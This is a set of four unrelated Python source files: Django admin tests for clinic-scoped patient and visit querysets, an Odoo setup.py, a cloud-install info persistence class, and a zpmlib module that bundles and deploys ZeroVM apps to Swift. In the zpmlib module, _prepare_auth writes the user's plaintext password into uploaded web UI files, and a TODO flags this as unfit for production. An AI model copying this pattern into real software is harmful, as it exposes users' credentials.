def setUp(self):
self.admin_user = User.objects.create_superuser(
'admin', 'admin@admin.com', password='admin')
self.clinic1_group = Group.objects.create(name='clinic group 1')
self.clinic1_user = User.objects.create_user(
'clinic1', 'clinic1@clinic1.com', password='clinic1')
self.clinic1_user.groups = [self.clinic1_group]
self.clinic1_user.save()
self.clinic1 = Clinic.objects.create(
name='Clinic 1', user=self.clinic1_user, te_id=uuid4().hex)
self.clinic2_group = Group.objects.create(name='clinic group 2')
self.clinic2_user = User.objects.create_user(
'clinic2', 'clinic2@clinic2.com', password='clinic2')
self.clinic2_user.groups = [self.clinic2_group]
self.clinic2_user.save()
self.clinic2 = Clinic.objects.create(
name='Clinic 2', user=self.clinic2_user, te_id=uuid4().hex)
self.site = AdminSite()
self.model_admin = self.model_admin_class(self.model_class, self.site)
class VisitAdminTestCase(ClinicAdminTestCase):
model_class = Visit
model_admin_class = VisitAdmin
def test_clinic_queryset_filter(self):
clinic1_patients = [p.te_id for p in
self.create_patients(self.clinic1, count=2)]
clinic2_patients = [p.te_id for p in
self.create_patients(self.clinic2, count=2)]
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
self.assertTrue(all([v.patient.te_id in clinic1_patients for v in
self.model_admin.queryset(request)]))
self.assertFalse(any([v.patient.te_id in clinic2_patients for v in
self.model_admin.queryset(request)]))
def test_superuser_queryset(self):
clinic1_patients = self.create_patients(self.clinic1, count=2)
clinic2_patients = self.create_patients(self.clinic2, count=2)
all_patients = set([
p.te_id for p in (clinic1_patients + clinic2_patients)])
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.assertEqual(
all_patients,
set([v.patient.te_id for v in self.model_admin.queryset(request)]))
def test_clinic_form_listing_for_clinic_user(self):
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
form = self.model_admin.get_form(request)()
self.assertTrue("Clinic 1" in str(form['clinic']))
self.assertFalse("Clinic 2" in str(form['clinic']))
class PatientAdminTestCase(ClinicAdminTestCase):
model_class = Patient
model_admin_class = PatientAdmin
def test_patient_queryset_filter(self):
clinic1_patients = [p.te_id for p in
self.create_patients(self.clinic1, count=2)]
clinic2_patients = [p.te_id for p in
self.create_patients(self.clinic2, count=2)]
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.clinic1_user
request.session = {}
self.assertTrue(all([patient.te_id in clinic1_patients for patient in
self.model_admin.queryset(request)]))
self.assertFalse(any([patient.te_id in clinic2_patients for patient in
self.model_admin.queryset(request)]))
def test_superuser_queryset(self):
clinic1_patients = self.create_patients(self.clinic1, count=2)
clinic2_patients = self.create_patients(self.clinic2, count=2)
all_patients = set([
p.te_id for p in (clinic1_patients + clinic2_patients)])
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.assertEqual(
all_patients,
set([patient.te_id for patient in
self.model_admin.queryset(request)]))
def test_clinic_save_model(self):
[patient] = self.create_patients(self.clinic1, count=1)
self.assertEqual(patient.owner, self.clinic1.user)
other_clinic1_user = User.objects.create_user(
'otherclinic1', 'otherclinic1@clinic1.com',
password='otherclinic1')
other_clinic1_user.groups = [self.clinic1_group]
other_clinic1_user.save()
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = other_clinic1_user
request.session = {}
self.model_admin.save_model(request, patient, None, None)
patient = Patient.objects.get(pk=patient.pk)
self.assertEqual(patient.owner, other_clinic1_user)
def test_superuser_save_model(self):
[patient] = self.create_patients(self.clinic1, count=1)
self.assertEqual(patient.owner, self.clinic1.user)
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.admin_user
request.session = {}
self.model_admin.save_model(request, patient, None, None)
patient = Patient.objects.get(pk=patient.pk)
self.assertEqual(patient.owner, self.clinic1.user)
| praekelt/txtalert | txtalert/core/tests/test_clinic_admin.py | Python | gpl-3.0 | 5,959 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
from glob import glob
from setuptools import find_packages, setup
from os.path import join, dirname
execfile(join(dirname(__file__), 'openerp', 'release.py')) # Load release variables
lib_name = 'openerp'
def py2exe_datafiles():
data_files = {}
data_files['Microsoft.VC90.CRT'] = glob('C:\Microsoft.VC90.CRT\*.*')
for root, dirnames, filenames in os.walk('openerp'):
for filename in filenames:
if not re.match(r'.*(\.pyc|\.pyo|\~)$', filename):
data_files.setdefault(root, []).append(join(root, filename))
import babel
data_files['babel/localedata'] = glob(join(dirname(babel.__file__), 'localedata', '*'))
others = ['global.dat', 'numbers.py', 'support.py', 'plural.py']
data_files['babel'] = map(lambda f: join(dirname(babel.__file__), f), others)
others = ['frontend.py', 'mofile.py']
data_files['babel/messages'] = map(lambda f: join(dirname(babel.__file__), 'messages', f), others)
import pytz
tzdir = dirname(pytz.__file__)
for root, _, filenames in os.walk(join(tzdir, 'zoneinfo')):
base = join('pytz', root[len(tzdir) + 1:])
data_files[base] = [join(root, f) for f in filenames]
import docutils
import passlib
import requests
data_mapping = ((docutils, 'docutils'),
(passlib, 'passlib'),
(requests, 'requests'))
for mod, datadir in data_mapping:
basedir = dirname(mod.__file__)
for root, _, filenames in os.walk(basedir):
base = join(datadir, root[len(basedir) + 1:])
data_files[base] = [join(root, f)
for f in filenames
if not f.endswith(('.py', '.pyc', '.pyo'))]
return data_files.items()
def py2exe_options():
if os.name == 'nt':
import py2exe
return {
'console': [
{'script': 'odoo.py'},
{'script': 'openerp-gevent'},
{'script': 'openerp-server', 'icon_resources': [
(1, join('setup', 'win32', 'static', 'pixmaps', 'openerp-icon.ico'))
]},
],
'options': {
'py2exe': {
'skip_archive': 1,
'optimize': 0, # Keep the assert running as the integrated tests rely on them.
'dist_dir': 'dist',
'packages': [
'asynchat', 'asyncore',
'commands',
'dateutil',
'decimal',
'decorator',
'docutils',
'email',
'encodings',
'HTMLParser',
'imaplib',
'jinja2',
'lxml', 'lxml._elementpath', 'lxml.builder', 'lxml.etree', 'lxml.objectify',
'mako',
'markupsafe',
'mock',
'ofxparse',
'openerp',
'openid',
'passlib',
'PIL',
'poplib',
'psutil',
'pychart',
'pydot',
'pyparsing',
'pyPdf',
'pytz',
'reportlab',
'requests',
'select',
'smtplib',
'suds',
'uuid',
'vatnumber',
'vobject',
'win32service', 'win32serviceutil',
'xlrd',
'xlwt',
'xml', 'xml.dom',
'yaml',
],
'excludes': ['Tkconstants', 'Tkinter', 'tcl'],
}
},
'data_files': py2exe_datafiles()
}
else:
return {}
setup(
name='odoo',
version=version,
description=description,
long_description=long_desc,
url=url,
author=author,
author_email=author_email,
classifiers=filter(None, classifiers.split('\n')),
license=license,
scripts=['openerp-server', 'odoo.py'],
packages=find_packages(),
package_dir={'%s' % lib_name: 'openerp'},
include_package_data=True,
install_requires=[
'babel >= 1.0',
'decorator',
'docutils',
'feedparser',
'gevent',
'Jinja2',
'lxml', # windows binary http://www.lfd.uci.edu/~gohlke/pythonlibs/
'mako',
'mock',
'ofxparse',
'passlib',
'pillow', # windows binary http://www.lfd.uci.edu/~gohlke/pythonlibs/
'psutil', # windows binary code.google.com/p/psutil/downloads/list
'psycogreen',
'psycopg2 >= 2.2',
'python-chart',
'pydot',
'pyparsing',
'pypdf',
'pyserial',
'python-dateutil',
'python-ldap', # optional
'python-openid',
'pytz',
'pyusb >= 1.0.0b1',
'pyyaml',
'qrcode',
'reportlab', # windows binary pypi.python.org/pypi/reportlab
'requests',
'suds-jurko',
'vatnumber',
'vobject',
'werkzeug',
'xlwt',
],
extras_require={
'SSL': ['pyopenssl'],
},
tests_require=[
'mock',
],
**py2exe_options()
)
| ToiDenGaAli/odoo | setup.py | Python | gpl-3.0 | 5,678 | 0.001585 |
from heat.engine.resources.cloudmanager.util.conf_util import *
class HwsCloudInfoPersist:
def __init__(self, _access_cloud_install_info_file, cloud_id):
self.info_handler = CloudInfoHandler(_access_cloud_install_info_file, cloud_id)
def write_vpc_info(self, vpc_id, vpc_name, vpc_cidr, security_group_id):
vpc_info = {
"id": vpc_id,
"name": vpc_name,
"cidr": vpc_cidr,
"security_group_id": security_group_id
}
self.info_handler.write_unit_info("vpc", vpc_info)
def write_subnets_cidr(self, vpc_cidr,
external_api_cidr,
tunnel_bearing_cidr,
internal_base_cidr,
debug_cidr):
subnets_cidr_info = {
"vpc_cidr": vpc_cidr,
"external_api_cidr": external_api_cidr,
"tunnel_bearing_cidr": tunnel_bearing_cidr,
"internal_base_cidr": internal_base_cidr,
"debug_cidr": debug_cidr
}
self.info_handler.write_unit_info("subnets_cidr", subnets_cidr_info)
def write_subnets_info(self, external_api_subnet, tunnel_bearing_subnet, internal_base_subnet, debug_subnet):
subnets_info = {
"external_api": external_api_subnet,
"tunnel_bearing": tunnel_bearing_subnet,
"internal_base": internal_base_subnet,
"debug": debug_subnet
}
self.info_handler.write_unit_info("subnets", subnets_info)
def write_cascaded_info(self, server_id, public_ip,
external_api_ip,tunnel_bearing_ip,
tunnel_bearing_nic_id, external_api_nic_id,
internal_base_nic_id, port_id_bind_public_ip):
cascaded_info = {"server_id": server_id,
"public_ip": public_ip,
"external_api_ip": external_api_ip,
"tunnel_bearing_ip": tunnel_bearing_ip,
"tunnel_bearing_nic_id":tunnel_bearing_nic_id,
"external_api_nic_id":external_api_nic_id,
"internal_base_nic_id":internal_base_nic_id,
"port_id_bind_public_ip":port_id_bind_public_ip
}
self.info_handler.write_unit_info("cascaded", cascaded_info)
def write_public_ip_info(self, vpn_public_ip,
vpn_public_ip_id,
cascaded_public_ip=None,
cascaded_public_ip_id=None):
public_ip_info = {
"vpn_public_ip": vpn_public_ip,
"vpn_public_ip_id": vpn_public_ip_id,
"cascaded_public_ip": cascaded_public_ip,
"cascaded_public_ip_id": cascaded_public_ip_id
}
self.info_handler.write_unit_info("public_ip", public_ip_info)
def write_vpn(self, server_id, public_ip, external_api_ip, tunnel_bearing_ip):
vpn_info = {"server_id": server_id,
"public_ip": public_ip,
"external_api_ip": external_api_ip,
"tunnel_bearing_ip": tunnel_bearing_ip}
self.info_handler.write_unit_info("vpn", vpn_info)
def write_proxy(self, proxy_info):
self.info_handler.write_unit_info("proxy_info", proxy_info)
def read_proxy(self):
return self.info_handler.get_unit_info("proxy_info")
def write_cloud_info(self, data):
self.info_handler.write_cloud_info(data)
def read_cloud_info(self):
return self.info_handler.read_cloud_info()
def delete_cloud_info(self):
self.info_handler.delete_cloud_info()
def list_all_cloud_id(self):
all_cloud = self.info_handler.get_all_unit_info()
return all_cloud.keys()
def get_cloud_info_with_id(self, cloud_id):
all_cloud = self.info_handler.get_all_unit_info()
if cloud_id in all_cloud.keys():
return all_cloud[cloud_id]
| hgqislub/hybird-orchard | code/cloudmanager/install/hws/hws_cloud_info_persist.py | Python | apache-2.0 | 3,963 | 0.005804 |
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import glob
import gzip
import json
import os
import shlex
import sys
import tarfile
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
import jinja2
import prettytable
import six
import swiftclient
import yaml
import zpmlib
from zpmlib import util
from zpmlib import zappbundler
from zpmlib import zapptemplate
_DEFAULT_UI_TEMPLATES = ['index.html.tmpl', 'style.css', 'zerocloud.js']
_ZAPP_YAML = 'python-zapp.yaml'
_ZAPP_WITH_UI_YAML = 'python-zapp-with-ui.yaml'
LOG = zpmlib.get_logger(__name__)
BUFFER_SIZE = 65536
#: path/filename of the system.map (job description) in every zapp
SYSTEM_MAP_ZAPP_PATH = 'boot/system.map'
#: Message displayed if insufficient auth settings are specified, either on the
#: command line or in environment variables. Shamelessly copied from
#: ``python-swiftclient``.
NO_AUTH_MSG = """\
Auth version 1.0 requires ST_AUTH, ST_USER, and ST_KEY environment variables
to be set or overridden with -A, -U, or -K.
Auth version 2.0 requires OS_AUTH_URL, OS_USERNAME, OS_PASSWORD, and
OS_TENANT_NAME OS_TENANT_ID to be set or overridden with --os-auth-url,
--os-username, --os-password, --os-tenant-name or os-tenant-id. Note:
adding "-V 2" is necessary for this."""
#: Column labels for the execution summary table
EXEC_TABLE_HEADER = [
'Node',
'Status',
'Retcode',
'NodeT',
'SysT',
'UserT',
'DiskReads',
'DiskBytesR',
'DiskWrites',
'DiskBytesW',
'NetworkReads',
'NetworkBytesR',
'NetworkWrites',
'NetworkBytesW',
]
def create_project(location, with_ui=False, template=None):
"""
Create a ZeroVM application project by writing a default `zapp.yaml` in the
specified directory `location`.
:param location:
Directory location to place project files.
:param with_ui:
Defaults to `False`. If `True`, add basic UI template files as well to
``location``.
:param template:
Default: ``None``. If no template is specified, use the default project
template. (See `zpmlib.zapptemplate`.)
:returns: List of created project files.
"""
if os.path.exists(location):
if not os.path.isdir(location):
# target must be an empty directory
raise RuntimeError("Target `location` must be a directory")
else:
os.makedirs(location)
# Run the template builder and create additional files for the project,
# according to the template type. If ``template`` is None, this is essentially a no-op.
# TODO: just use the afc._created_files
created_files = []
with util.AtomicFileCreator() as afc:
for file_type, path, contents in zapptemplate.template(
location, template, with_ui=with_ui):
afc.create_file(file_type, path, contents)
created_files.append(path)
return created_files
def find_project_root():
"""
Starting from the `cwd`, search up the file system hierarchy until a
``zapp.yaml`` file is found. Once the file is found, return the directory
containing it. If no file is found, raise a `RuntimeError`.
"""
root = os.getcwd()
while not os.path.isfile(os.path.join(root, 'zapp.yaml')):
oldroot, root = root, os.path.dirname(root)
if root == oldroot:
raise RuntimeError("no zapp.yaml file found")
return root
def _generate_job_desc(zapp):
"""
Generate the boot/system.map file contents from the zapp config file.
:param zapp:
`dict` of the contents of a ``zapp.yaml`` file.
:returns:
`dict` of the job description
"""
job = []
# TODO(mg): we should eventually reuse zvsh._nvram_escape
def escape(value):
for c in '\\", \n':
value = value.replace(c, '\\x%02x' % ord(c))
return value
def translate_args(cmdline):
# On Python 2, the yaml module loads non-ASCII strings as
# unicode objects. In Python 2.7.2 and earlier, we must give
# shlex.split a str -- but it is an error to give shlex.split
# a bytes object in Python 3.
need_decode = not isinstance(cmdline, str)
if need_decode:
cmdline = cmdline.encode('utf8')
args = shlex.split(cmdline)
if need_decode:
args = [arg.decode('utf8') for arg in args]
return ' '.join(escape(arg) for arg in args)
for zgroup in zapp['execution']['groups']:
# Copy everything, but handle 'env', 'path', and 'args' specially:
jgroup = dict(zgroup)
path = zgroup['path']
# if path is `file://image:exe`, exec->name is "exe"
# if path is `swift://~/container/obj`, exec->name is "obj"
exec_name = None
if path.startswith('file://'):
exec_name = path.split(':')[-1]
elif path.startswith('swift://'):
# If obj is a pseudo path, like foo/bar/obj, we need to
# handle this as well with a careful split.
# If the object path is something like `swift://~/container/obj`,
# then exec_name will be `obj`.
# If the object path is something like
# `swift://./container/foo/bar/obj`, then the exec_name will be
# `foo/bar/obj`.
exec_name = path.split('/', 4)[-1]
jgroup['exec'] = {
'path': zgroup['path'],
'args': translate_args(zgroup['args']),
}
if exec_name is not None:
jgroup['exec']['name'] = exec_name
del jgroup['path'], jgroup['args']
if 'env' in zgroup:
jgroup['exec']['env'] = zgroup['env']
del jgroup['env']
job.append(jgroup)
return job
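# Illustrative sketch (assumed zapp.yaml shape, not part of the original
# module): an execution group such as
#   {'name': 'hello', 'path': 'file://python2.7:python', 'args': 'hello.py',
#    'devices': [{'name': 'python2.7'}, {'name': 'stdout'}]}
# is translated into a job entry like
#   {'name': 'hello', 'devices': [{'name': 'python2.7'}, {'name': 'stdout'}],
#    'exec': {'path': 'file://python2.7:python', 'args': 'hello.py',
#             'name': 'python'}}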
def _get_swift_zapp_url(swift_service_url, zapp_path):
"""
:param str swift_service_url:
The Swift service URL returned from a Keystone service catalog.
Example: http://localhost:8080/v1/AUTH_469a9cd20b5a4fc5be9438f66bb5ee04
:param str zapp_path:
<container>/<zapp-file-name>. Example:
test_container/myapp.zapp
Here's a typical usage example, with typical input and output:
>>> swift_service_url = ('http://localhost:8080/v1/'
... 'AUTH_469a9cd20b5a4fc5be9438f66bb5ee04')
>>> zapp_path = 'test_container/myapp.zapp'
>>> _get_swift_zapp_url(swift_service_url, zapp_path)
'swift://AUTH_469a9cd20b5a4fc5be9438f66bb5ee04/test_container/myapp.zapp'
"""
swift_path = urlparse.urlparse(swift_service_url).path
# TODO(larsbutler): Why do we need to check if the path contains '/v1/'?
# This is here due to legacy reasons, but it's not clear to me why this is
# needed.
if swift_path.startswith('/v1/'):
swift_path = swift_path[4:]
return 'swift://%s/%s' % (swift_path, zapp_path)
def _prepare_job(tar, zapp, zapp_swift_url):
"""
:param tar:
The application .zapp file, as a :class:`tarfile.TarFile` object.
:param dict zapp:
Parsed contents of the application `zapp.yaml` specification, as a
`dict`.
:param str zapp_swift_url:
Path of the .zapp in Swift, which looks like this::
'swift://AUTH_abcdef123/test_container/hello.zapp'
See :func:`_get_swift_zapp_url`.
:returns:
Extracted contents of the boot/system.map with the swift
path to the .zapp added to the `devices` for each `group`.
So if the job looks like this::
[{'exec': {'args': 'hello.py', 'path': 'file://python2.7:python'},
'devices': [{'name': 'python2.7'}, {'name': 'stdout'}],
'name': 'hello'}]
the output will look like something like this::
[{'exec': {u'args': 'hello.py', 'path': 'file://python2.7:python'},
'devices': [
{'name': 'python2.7'},
{'name': 'stdout'},
{'name': 'image',
'path': 'swift://AUTH_abcdef123/test_container/hello.zapp'},
],
'name': 'hello'}]
"""
fp = tar.extractfile(SYSTEM_MAP_ZAPP_PATH)
# NOTE(larsbutler): the `decode` is needed for python3
# compatibility
job = json.loads(fp.read().decode('utf-8'))
device = {'name': 'image', 'path': zapp_swift_url}
for group in job:
group['devices'].append(device)
return job
def bundle_project(root, refresh_deps=False):
"""
Bundle the project under root.
"""
zapp_yaml = os.path.join(root, 'zapp.yaml')
zapp = yaml.safe_load(open(zapp_yaml))
zapp_name = zapp['meta']['name'] + '.zapp'
zapp_tar_path = os.path.join(root, zapp_name)
tar = tarfile.open(zapp_tar_path, 'w:gz')
job = _generate_job_desc(zapp)
job_json = json.dumps(job)
info = tarfile.TarInfo(name='boot/system.map')
# This size is only correct because json.dumps uses
# ensure_ascii=True by default and we thus have a 1-1
# correspondence between Unicode characters and bytes.
info.size = len(job_json)
LOG.info('adding %s' % info.name)
# In Python 3, we cannot use a str or bytes object with addfile,
# we need a BytesIO object. In Python 2, BytesIO is just StringIO.
# Since json.dumps produces an ASCII-only Unicode string in Python
# 3, it is safe to encode it to ASCII.
tar.addfile(info, BytesIO(job_json.encode('ascii')))
_add_file_to_tar(root, 'zapp.yaml', tar)
sections = ('bundling', 'ui')
# Keep track of the files we add, given the configuration in the zapp.yaml.
file_add_count = 0
for section in sections:
for pattern in zapp.get(section, []):
paths = glob.glob(os.path.join(root, pattern))
if len(paths) == 0:
LOG.warning(
"pattern '%(pat)s' in section '%(sec)s' matched no files",
dict(pat=pattern, sec=section)
)
else:
for path in paths:
_add_file_to_tar(root, path, tar)
file_add_count += len(paths)
if file_add_count == 0:
# None of the files specified in the "bundling" or "ui" sections were
# found. Something is wrong.
raise zpmlib.ZPMException(
"None of the files specified in the 'bundling' or 'ui' sections of"
" the zapp.yaml matched anything."
)
# Do template-specific bundling
zappbundler.bundle(root, zapp, tar, refresh_deps=refresh_deps)
tar.close()
print('created %s' % zapp_name)
def _add_file_to_tar(root, path, tar, arcname=None):
"""
:param root:
Root working directory.
:param path:
File path.
:param tar:
Open :class:`tarfile.TarFile` object to add the ``files`` to.
"""
# TODO(larsbutler): document ``arcname``
LOG.info('adding %s' % path)
path = os.path.join(root, path)
relpath = os.path.relpath(path, root)
if arcname is None:
# In the archive, give the file the same name and path.
arcname = relpath
tar.add(path, arcname=arcname)
def _find_ui_uploads(zapp, tar):
matches = set()
names = tar.getnames()
for pattern in zapp.get('ui', []):
matches.update(fnmatch.filter(names, pattern))
return sorted(matches)
def _post_job(url, token, data, http_conn=None, response_dict=None,
content_type='application/json', content_length=None,
response_body_buffer=None):
# Modelled after swiftclient.client.post_account.
headers = {'X-Auth-Token': token,
'X-Zerovm-Execute': '1.0',
'Content-Type': content_type}
if content_length:
headers['Content-Length'] = str(content_length)
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = swiftclient.http_connection(url)
conn.request('POST', parsed.path, data, headers)
resp = conn.getresponse()
body = resp.read()
swiftclient.http_log((url, 'POST'), {'headers': headers}, resp, body)
swiftclient.store_response(resp, response_dict)
if response_body_buffer is not None:
response_body_buffer.write(body)
class ZeroCloudConnection(swiftclient.Connection):
"""
An extension of the `swiftclient.Connection` which has the capability of
posting ZeroVM jobs to an instance of ZeroCloud (running on Swift).
"""
def authenticate(self):
"""
Authenticate with the provided credentials and cache the storage URL
and auth token as `self.url` and `self.token`, respectively.
"""
self.url, self.token = self.get_auth()
def post_job(self, job, response_dict=None, response_body_buffer=None):
"""Start a ZeroVM job, using a pre-uploaded zapp
:param object job:
Job description. This will be encoded as JSON and sent to
ZeroCloud.
"""
json_data = json.dumps(job)
LOG.debug('JOB: %s' % json_data)
return self._retry(None, _post_job, json_data,
response_dict=response_dict,
response_body_buffer=response_body_buffer)
def post_zapp(self, data, response_dict=None, content_length=None,
response_body_buffer=None):
return self._retry(None, _post_job, data,
response_dict=response_dict,
content_type='application/x-gzip',
content_length=content_length,
response_body_buffer=response_body_buffer)
def _get_zerocloud_conn(args):
version = args.auth_version
# no version was explicitly requested; try to guess it:
if version is None:
version = _guess_auth_version(args)
if version == '1.0':
if any([arg is None for arg in (args.auth, args.user, args.key)]):
raise zpmlib.ZPMException(
"Version 1 auth requires `--auth`, `--user`, and `--key`."
"\nSee `zpm deploy --help` for more information."
)
conn = ZeroCloudConnection(args.auth, args.user, args.key)
elif version == '2.0':
if any([arg is None for arg in
(args.os_auth_url, args.os_username, args.os_tenant_name,
args.os_password)]):
raise zpmlib.ZPMException(
"Version 2 auth requires `--os-auth-url`, `--os-username`, "
"`--os-password`, and `--os-tenant-name`."
"\nSee `zpm deploy --help` for more information."
)
conn = ZeroCloudConnection(args.os_auth_url, args.os_username,
args.os_password,
tenant_name=args.os_tenant_name,
auth_version='2.0')
else:
raise zpmlib.ZPMException(NO_AUTH_MSG)
return conn
def _deploy_zapp(conn, target, zapp_path, auth_opts, force=False):
"""Upload all of the necessary files for a zapp.
Returns the name an uploaded index file, or the target if no
index.html file was uploaded.
:param bool force:
Force deployment, even if the target container is not empty. This means
that files could be overwritten and could cause consistency problems
with these objects in Swift.
"""
base_container = target.split('/')[0]
try:
_, objects = conn.get_container(base_container)
if not len(objects) == 0:
if not force:
raise zpmlib.ZPMException(
"Target container ('%s') is not empty.\nDeploying to a "
"non-empty container can cause consistency problems with "
"overwritten objects.\nSpecify the flag `--force/-f` to "
"overwrite anyway."
% base_container
)
except swiftclient.exceptions.ClientException:
# container doesn't exist; create it
LOG.info("Container '%s' not found. Creating it...", base_container)
conn.put_container(base_container)
# If we get here, everything with the container is fine.
index = target + '/'
uploads = _generate_uploads(conn, target, zapp_path, auth_opts)
for path, data, content_type in uploads:
if path.endswith('/index.html'):
index = path
container, obj = path.split('/', 1)
conn.put_object(container, obj, data, content_type=content_type)
return index
def _generate_uploads(conn, target, zapp_path, auth_opts):
"""Generate sequence of (container-and-file-path, data, content-type)
tuples.
"""
tar = tarfile.open(zapp_path, 'r:gz')
zapp_config = yaml.safe_load(tar.extractfile('zapp.yaml'))
remote_zapp_path = '%s/%s' % (target, os.path.basename(zapp_path))
swift_url = _get_swift_zapp_url(conn.url, remote_zapp_path)
job = _prepare_job(tar, zapp_config, swift_url)
yield (remote_zapp_path, gzip.open(zapp_path).read(), 'application/x-tar')
yield ('%s/%s' % (target, SYSTEM_MAP_ZAPP_PATH), json.dumps(job),
'application/json')
for path in _find_ui_uploads(zapp_config, tar):
output = tar.extractfile(path).read()
if path.endswith('.tmpl'):
tmpl = jinja2.Template(output.decode('utf-8'))
output = tmpl.render(auth_opts=auth_opts, zapp=zapp_config)
# drop the .tmpl extension
path = os.path.splitext(path)[0]
ui_path = '%s/%s' % (target, path)
yield (ui_path, output, None)
def _prepare_auth(version, args, conn):
"""
:param str version:
Auth version: "0.0", "1.0", or "2.0". "0.0" indicates "no auth".
:param args:
:class:`argparse.Namespace` instance, with attributes representing the
various authentication parameters
:param conn:
:class:`ZeroCloudConnection` instance.
"""
version = str(float(version))
auth = {'version': version}
if version == '0.0':
auth['swiftUrl'] = conn.url
elif version == '1.0':
auth['authUrl'] = args.auth
auth['username'] = args.user
auth['password'] = args.key
else:
# TODO(mg): inserting the username and password in the
# uploaded file makes testing easy, but should not be done in
# production. See issue #46.
auth['authUrl'] = args.os_auth_url
auth['tenant'] = args.os_tenant_name
auth['username'] = args.os_username
auth['password'] = args.os_password
return auth
def _guess_auth_version(args):
"""Guess the auth version from first the command line args and/or envvars.
Command line arguments override environment variables, so we check those
first.
Auth v1 arguments:
* ``--auth``
* ``--user``
* ``--key``
Auth v2 arguments:
* ``--os-auth-url``
* ``--os-username``
* ``--os-password``
* ``--os-tenant-name``
If all of the v1 and v2 arguments are specified, default to 1.0 (this is
how ``python-swiftclient`` behaves).
If no auth version can be determined from the command line args, we check
environment variables.
Auth v1 vars:
* ``ST_AUTH``
* ``ST_USER``
* ``ST_KEY``
Auth v2 vars:
* ``OS_AUTH_URL``
* ``OS_USERNAME``
* ``OS_PASSWORD``
* ``OS_TENANT_NAME``
The same rule above applies; if both sets of variables are specified,
default to 1.0.
If no auth version can be determined, return `None`.
:param args:
:class:`argparse.Namespace`, representing the args specified on the
command line.
:returns: '1.0', '2.0', or ``None``
"""
v1 = (args.auth, args.user, args.key)
v2 = (args.os_auth_url, args.os_username, args.os_password,
args.os_tenant_name)
if all(v1) and not all(v2):
return '1.0'
elif all(v2) and not all(v1):
return '2.0'
elif all(v1) and all(v2):
# All vars for v1 and v2 auth are set, so we follow the
# `python-swiftclient` behavior and default to 1.0.
return '1.0'
else:
# deduce from envvars
env = os.environ
v1_env = (env.get('ST_AUTH'), env.get('ST_USER'), env.get('ST_KEY'))
v2_env = (env.get('OS_AUTH_URL'), env.get('OS_USERNAME'),
env.get('OS_PASSWORD'), env.get('OS_TENANT_NAME'))
if all(v1_env) and not all(v2_env):
return '1.0'
if all(v2_env) and not all(v1_env):
return '2.0'
elif all(v1_env) and all(v2_env):
# Same as above, if all v1 and v2 vars are set, default to 1.0.
return '1.0'
else:
# Insufficient auth details have been specified.
return None
def deploy_project(args):
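    """Deploy a zapp to the target Swift container.
    Authenticates, uploads the zapp along with its system map and UI files,
    and, when ``args.execute`` is set, runs the job and optionally prints an
    execution summary.
    """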
conn = _get_zerocloud_conn(args)
conn.authenticate()
ui_auth_version = conn.auth_version
# We can now reset the auth for the web UI, if needed
if args.no_ui_auth:
ui_auth_version = '0.0'
auth = _prepare_auth(ui_auth_version, args, conn)
auth_opts = jinja2.Markup(json.dumps(auth))
deploy_index = _deploy_zapp(conn, args.target, args.zapp, auth_opts,
force=args.force)
print('app deployed to\n %s/%s' % (conn.url, deploy_index))
if args.execute:
# for compatibility with the option name in 'zpm execute'
args.container = args.target
resp_body_buffer = BytesIO()
resp = execute(args, response_body_buffer=resp_body_buffer)
resp_body_buffer.seek(0)
if resp['status'] < 200 or resp['status'] >= 300:
raise zpmlib.ZPMException(resp_body_buffer.read())
if args.summary:
total_time, exec_table = _get_exec_table(resp)
print('Execution summary:')
print(exec_table)
print('Total time: %s' % total_time)
sys.stdout.write(resp_body_buffer.read())
def _get_exec_table(resp):
"""Build an execution summary table from a job execution response.
:param dict resp:
Response dictionary from job execution. Must contain a ``headers`` key
at least (and will typically contain ``status`` and ``reason`` as
well).
:returns:
Tuple of total execution time (`str`),
``prettytable.PrettyTable`` containing the summary of all node
executions in the job.
"""
headers = resp['headers']
total_time, table_data = _get_exec_table_data(headers)
table = prettytable.PrettyTable(EXEC_TABLE_HEADER)
for row in table_data:
table.add_row(row)
return total_time, table
def _get_exec_table_data(headers):
"""Extract a stats table from execution HTTP response headers.
Stats include things like node name, execution time, number of
reads/writes, bytes read/written, etc.
:param dict headers:
`dict` of response headers from a job execution request. It must
contain at least ``x-nexe-system``, ``x-nexe-status``,
``x-nexe-retcode``, ``x-nexe-cdr-line``.
:returns:
Tuple of two items. The first is the total time for the executed job
(as a `str`). The second is a table (2d `list`) of execution data
extracted from ``X-Nexe-System`` and ``X-Nexe-Cdr-Line`` headers.
Each row in the table consists of the following data:
* node name
* node time
* system time
* user time
* number of disk reads
* number of bytes read from disk
* number of disk writes
* number of bytes written to disk
* number of network reads
* number of bytes read from network
* number of network writes
* number of bytes written to network
"""
node_names = iter(headers['x-nexe-system'].split(','))
statuses = iter(headers['x-nexe-status'].split(','))
retcodes = iter(headers['x-nexe-retcode'].split(','))
cdr = headers['x-nexe-cdr-line']
cdr_data = [x.strip() for x in cdr.split(',')]
total_time = cdr_data.pop(0)
cdr_data = iter(cdr_data)
def adviter(x):
return six.advance_iterator(x)
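    # After the leading total time, each node contributes two consecutive CDR
    # entries: its node time followed by a space-separated accounting line.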
table_data = []
while True:
try:
node_name = adviter(node_names)
status = adviter(statuses)
retcode = adviter(retcodes)
node_time = adviter(cdr_data)
cdr = adviter(cdr_data).split()
row = [node_name, status, retcode, node_time] + cdr
table_data.append(row)
except StopIteration:
break
return total_time, table_data
def execute(args, response_body_buffer=None):
"""Execute a zapp remotely on a ZeroCloud deployment.
:returns:
A `dict` with response data, including the keys 'status', 'reason', and
'headers'.
"""
